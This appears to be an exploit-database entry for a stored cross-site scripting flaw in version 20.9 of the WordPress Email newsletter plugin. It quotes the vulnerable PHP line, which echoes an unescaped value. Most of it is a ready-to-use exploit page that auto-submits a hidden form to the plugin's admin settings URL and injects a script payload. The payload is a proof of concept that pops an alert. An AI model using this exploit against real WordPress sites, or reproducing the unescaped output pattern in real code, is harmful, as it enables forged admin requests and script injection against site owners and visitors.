id: 23068
date: 01/05/2015
title: Wordpress Email newsletter 20.9 Cross Site Scripting Vulnerability
author: Ashiyane
cves: 

######################
# Exploit Title : Wordpress Email newsletter 20.9 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : https://wordpress.org/plugins/email-newsletter/

# Software Link : https://downloads.wordpress.org/plugin/email-newsletter.20.9.zip

# Date : 2015-01-03

# Tested on : Windows 7 / Mozilla Firefox
######################

# Location : http://127.0.0.1/wordpress/wp-admin/admin.php?page=email-setting

######################
# Vulnerable code :
<input name="eemail_from_name" id="eemail_from_name" type="text"
value="<?php echo $eemail_from_name; ?>" maxlength="150" size="50" />
#####################

Exploit Code:

<html>
<body>
<form name="eemail_form" method="post"
action="http://localhost/wordpress/wp-admin/admin.php?page=email-setting" onsubmit="return
_email_setting()" >
<input name="eemail_from_email" id="eemail_from_email" type="hidden"
value='"><script>alert(1)</script>' maxlength="150" size="50" />
<script language="Javascript">
setTimeout('eemail_form.submit()', 1);
</script>
</body>
</html>

#  0day.today [2023-03-24]  #